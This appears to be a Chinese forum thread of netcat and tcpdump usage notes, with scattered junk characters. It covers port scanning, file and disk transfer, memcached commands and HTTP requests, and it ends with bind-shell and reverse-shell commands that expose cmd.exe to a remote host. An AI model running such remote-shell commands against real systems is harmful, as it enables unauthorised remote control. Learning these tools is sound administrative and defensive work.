tcpdump 、nc的使用记录

admin

nc -v 100.12.11.122  4952  
8 q( w' z; ]# ?( G5 y nc的使用见回帖
0 a4 W* p: `# ]( V  K" Y5 M
tcpdump -i any port 4952 -A -nnn -vvv |grep storage   
# @- m- G: a! {
, W8 Y( J' A# B6 E; O" I$ xtcpdump略

1 c- A! r0 j7 b! e2 y, j
* Z2 \% K6 ^4 Q( x: Z5 q. h# w

admin

nc 的参　　数：
-g<网关>  设置路由器跃程通信网关，最丢哦可设置8个。
* _1 R; M3 n' k$ x -G<指向器数目>  设置来源路由指向器，其数值为4的倍数。
4 z  a$ n' T0 z5 X/ K0 s4 @; b( | -h  在线帮助。
-i<延迟秒数>  设置时间间隔，以便传送信息及扫描通信端口。
-l  使用监听模式，管控传入的资料。
* W+ o6 K. ?' E1 r -n  直接使用IP地址，而不通过域名服务器。
-o<输出文件>  指定文件名称，把往来传输的数据以16进制字码倾倒成该文件保存。
7 {6 H" v5 z: h  Q& ~ -p<通信端口>  设置本地主机使用的通信端口。
-r  乱数指定本地与远端主机的通信端口。
-s<来源位址>  设置本地主机送出数据包的IP地址。
-u  使用UDP传输协议。
-v 详细输出--用两个-v可得到更详细的内容
-w<超时秒数>  设置等待连线的时间。
-z  使用0输入/输出模式，只在扫描通信端口时使用。

admin

测试：
  端口扫描
0 D- t$ Y# C: L2 K, J# nc -v -w 2 192.168.2.34 -z 21-24
" v% F8 ?4 w4 K5 y6 G$ mnc: connect to 192.168.2.34 port 21 (tcp) failed: Connection refused
' _+ m) c  j5 J" pConnection to 192.168.2.34 22 port [tcp/ssh] succeeded!
% \: i% P5 @5 M$ i' P7 \' x4 unc: connect to 192.168.2.34 port 23 (tcp) failed: Connection refused
nc: connect to 192.168.2.34 port 24 (tcp) failed: Connection refused

admin

从192.168.2.33拷贝文件到192.168.2.34
3 B- [, P+ B* |2 }& o在192.168.2.34上： nc -l 1234 > test.txt
在192.168.2.33上： nc 192.168.2.34 < test.txt

admin

简单聊天工具
0 {/ q# D. k  l( Z2 q在192.168.2.34上： nc -l 1234
# J$ y6 p+ g' V9 _  s5 ]在192.168.2.33上： nc 192.168.2.34 1234
这样，双方就可以相互交流了。使用ctrl+C(或D）退出。

admin

用nc命令操作memcached
1）存储数据：printf “set key 0 10 6rnresultrn” |nc 192.168.2.34 11211
7 ~2 j/ r! m' B) j, h5 h2）获取数据：printf “get keyrn” |nc 192.168.2.34 11211
" j* h. S: ?1 z5 D+ P; `( w9 A3）删除数据：printf “delete keyrn” |nc 192.168.2.34 11211
4）查看状态：printf “statsrn” |nc 192.168.2.34 11211
5）模拟top命令查看状态：watch “echo stats” |nc 192.168.2.34 11211
6）清空缓存：printf “flush_allrn” |nc 192.168.2.34 11211 (小心操作，清空了缓存就没了）

admin

nc -p 1234 -w 5 host.example.com 80
建立从本地1234端口到host.example.com的80端口连接，5秒超时
. W! E) U& t2 m/ }! h- J- Rnc -u host.example.com 53
( p- d+ O# P5 d. ?- g/ R6 _u为UDP连接

admin

echo -n "GET / HTTP/1.0"r"n"r"n" | nc host.example.com 80
连接到主机并执行

admin

nc -v -z host.example.com 70-80
扫描端口(70到80)，可指定范围。-v输出详细信息。

admin

远程拷贝文件
从server1拷贝文件到server2上。需要先在server2上，用nc激活监听，
1 w- \1 j6 `: p4 j1 M
+ ]$ O2 u; D: L  Q' U- ~server2上运行：

root@hatest2 tmp]# nc -lp 123 > install.log
4 O- h) B' I) B
; t# P8 B/ q; t, jserver1上运行：

[root@hatest1 ~]# ll install.log
-rw-r–r–  1 root root 39693 12月 20  2007 install.log
[root@hatest1 ~]# nc -w 1 192.168.228.222 123 < install.log

admin

克隆硬盘或分区
) B. [2 \# D4 d$ U3 H+ a" f操作与上面的拷贝是雷同的，只需要由dd获得硬盘或分区的数据，然后传输即可。
克隆硬盘或分区的操作，不应在已经mount的的系统上进行。所以，需要使用安装光盘引导后，进入拯救模式（或使用Knoppix工 具光盘）启动系统后，在server2上进行类似的监听动作：
# nc -l -p 1234 | dd of=/dev/sda

7 v: h/ _+ T6 b9 H: Xserver1上执行传输，即可完成从server1克隆sda硬盘到server2的任务：
$ }$ y  H& K# U! ]# dd if=/dev/sda | nc 192.168.228.222 1234
* X4 x9 O% ]- {5 M' L  {
2 u! s% ^* d3 y6 P6 S: v8 U$ w# ^6 W※ 完成上述工作的前提，是需要落实光盘的拯救模式支持服务器上的网卡，并正确配置IP。

admin

克隆硬盘或分区
操作与上面的拷贝是雷同的，只需要由dd获得硬盘或分区的数据，然后传输即可。
克隆硬盘或分区的操作，不应在已经mount的的系统上进行。所以，需要使用安装光盘引导后，进入拯救模式（或使用Knoppix工 具光盘）启动系统后，在server2上进行类似的监听动作：
# nc -l -p 1234 | dd of=/dev/sda
. N% N$ o9 J4 ?, U  I4 U
server1上执行传输，即可完成从server1克隆sda硬盘到server2的任务：
# dd if=/dev/sda | nc 192.168.228.222 1234

※ 完成上述工作的前提，是需要落实光盘的拯救模式支持服务器上的网卡，并正确配置IP。

1320503165

保存Web页面
# while true; do nc -l -p 80 -q 1 < somepage.html; done

1320503165

模拟HTTP Headers,获取网页源代码和返回头部信息

  t! H- ], ]; s" r[root@hatest1 ~]# nc www.linuxso.com 80
0 x' ~7 A2 M* l+ {; t9 IGET / HTTP/1.1
Host: ispconfig.org
Referrer: mypage.com
User-Agent: my-browser
- I+ \$ ~" x1 c+ s# s, @+ s
8 C1 `- F! Z+ @4 g' NHTTP/1.1 200 OK
Date: Tue, 16 Dec 2008 07:23:24 GMT
Server: Apache/2.2.6 (Unix) DAV/2 mod_mono/1.2.1 mod_python/3.2.8 Python/2.4.3 mod_perl/2.0.2 Perl/v5.8.8
Set-Cookie: PHPSESSID=bbadorbvie1gn037iih6lrdg50; path=/
5 m5 {  |" ^% ?Expires: 0
, {! s# ]7 X- n/ N& M* ICache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
& p+ x- l7 [- LPragma: no-cache
, v2 q! ~1 [. ^2 v3 W  v' e1 i- iCache-Control: private, post-check=0, pre-check=0, max-age=0
Set-Cookie: oWn_sid=xRutAY; expires=Tue, 23-Dec-2008 07:23:24 GMT; path=/
+ g3 }5 X" P: t' ~Vary: Accept-Encoding
Transfer-Encoding: chunked
Content-Type: text/html
; Q$ I+ ^! v6 f+ ^[......]
1 A) I2 f6 o  Z% g& i; d* N在nc命令后，输入红色部分的内容，然后按两次回车，即可从对方获得HTTP Headers内容。


( x- R. v0 h0 t3 t# Y2 L" X
9 Y3 f" e# @+ t8 e9 _, |传输目录
0 ?, @8 T* m' ~; L% G- T从server1拷贝nginx-0.6.34目录内容到server2上。需要先在server2上，用nc激活监听，server2上运行：
1 V! d0 y8 B9 ?  {6 K引用
1 V  y$ ]: }$ r- J
[root@hatest2 tmp]# nc -l 1234 |tar xzvf -
server1上运行：
引用

[root@hatest1 ~]# ll -d nginx-0.6.34
4 D; t  L$ n4 F6 Edrwxr-xr-x 8 1000 1000 4096 12-23 17:25 nginx-0.6.34
% j: C8 |2 e* o7 A/ ][root@hatest1 ~]# tar czvf – nginx-0.6.34|nc 192.168.228.222 1234
5 A4 ?* j* B! T. ^# V% O
0 ~1 Q5 m7 i) \0 v1 f3 Q' R$ s
2 W7 z6 a; t! u/ K* E# M3 d8 Y
1 ^; I5 J9 Q6 Z0 _: wREMOTE主机绑定SHELL
例子：

格式：nc -l -p 5354 -t -e c:\winnt\system32\cmd.exe
讲解：绑定REMOTE主机的CMDSHELL在REMOTE主机的TCP5354端口
9 w* t, [6 J: a5 p+ q

REMOTE主机绑定SHELL并反向连接
9 m: @3 T2 o6 v) h例子：

格式：nc -t -e c:\winnt\system32\cmd.exe 192.168.x.x 5354
6 C4 k9 _. n+ _- a) L6 x讲解：绑定REMOTE主机的CMDSHELL并反向连接到192.168.x.x的TCP5354端口
0 u) N( R* O0 ?( r: U7 o  f以上为最基本的几种用法（其实NC的用法还有很多，
; G7 P# E( O4 i# p, ?当配合管道命令"|"与重定向命令"<"、">"等等命令功能更强大......）